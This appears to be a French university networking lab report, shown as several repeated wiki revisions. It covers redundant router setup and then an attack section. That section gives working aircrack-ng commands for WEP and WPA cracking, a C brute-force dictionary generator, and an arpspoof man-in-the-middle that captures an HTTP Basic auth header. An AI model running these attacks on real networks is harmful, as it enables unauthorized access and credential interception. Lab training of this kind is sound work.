airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53963TP sysres IMA2a5 2020/2021 G62020-11-20T11:12:37Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
pastabox.site [pastabox.site,http://193.48.57.169]<br />
<br />
__TOC__<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53962TP sysres IMA2a5 2020/2021 G62020-11-20T11:12:23Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
pastabox.site [pastabox.site http://193.48.57.169]<br />
<br />
__TOC__<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53961TP sysres IMA2a5 2020/2021 G62020-11-20T11:11:40Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
pastabox.site[http://193.48.57.169]<br />
<br />
__TOC__<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53960TP sysres IMA2a5 2020/2021 G62020-11-20T11:11:19Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
[http://193.48.57.169]<br />
<br />
__TOC__<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
